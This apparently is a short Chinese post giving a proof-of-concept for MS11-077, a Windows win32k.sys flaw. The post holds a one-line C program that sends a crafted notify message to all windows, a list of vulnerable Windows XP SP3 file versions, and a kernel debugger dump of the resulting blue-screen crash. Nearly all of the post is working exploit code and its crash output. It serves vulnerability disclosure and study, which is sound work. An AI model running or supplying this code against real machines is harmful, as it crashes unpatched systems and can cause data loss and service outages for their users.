• MS11-077的一个BSOD代码

/*
 * 【作者:KiDebug】
 * 【E-Mail:Google¥pku.edu.cn】
 */
#include <Windows.h>

void main()
{
  SendNotifyMessage((HWND)-1,0x180,0,0);
}


测试系统:
Windows XP SP3,不安装其他任何安全软件:
WindowsXPprosp3VOL微软原版+正版密钥.iso
user32.dll(5.1.2600.5512)
win32k.sys(5.1.2600.5512,小于5.1.2600.6149的应该都可以)

引用:
 0: kd> r
eax=0000001d ebx=bf80ee6b ecx=ffffffff edx=bc5d0650 esi=ffffffff edi=ee0a3d64
eip=bf8cfecc esp=ee0a3d08 ebp=ee0a3d08 iopl=0         nv up ei pl nz na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010206
win32k!NtUserfnINLBOXSTRING+0x8:
bf8cfecc 8b4120          mov     eax,dword ptr [ecx+20h] ds:0023:0000001f=????????

0: kd> kp
ChildEBP RetAddr  
ee0a3d08 bf80eed3 win32k!NtUserfnINLBOXSTRING+0x8
ee0a3d40 8054261c win32k!NtUserMessageCall+0xae
ee0a3d40 7c92e4f4 nt!KiFastCallEntry+0xfc
0012ff3c 77d194be ntdll!KiFastSystemCallRet
0012ff64 00401011 USER32!NtUserMessageCall+0xc
0012ff78 00401148 1!main(void)+0x11 [r:\temp\1\1.cpp @ 6]
0012ffc0 7c817067 1!__tmainCRTStartup(void)+0x10b [f:\dd\vctools\crt_bld\self_x86\crt\src\crt0.c @ 278]
0012fff0 00000000 kernel32!BaseProcessStart+0x23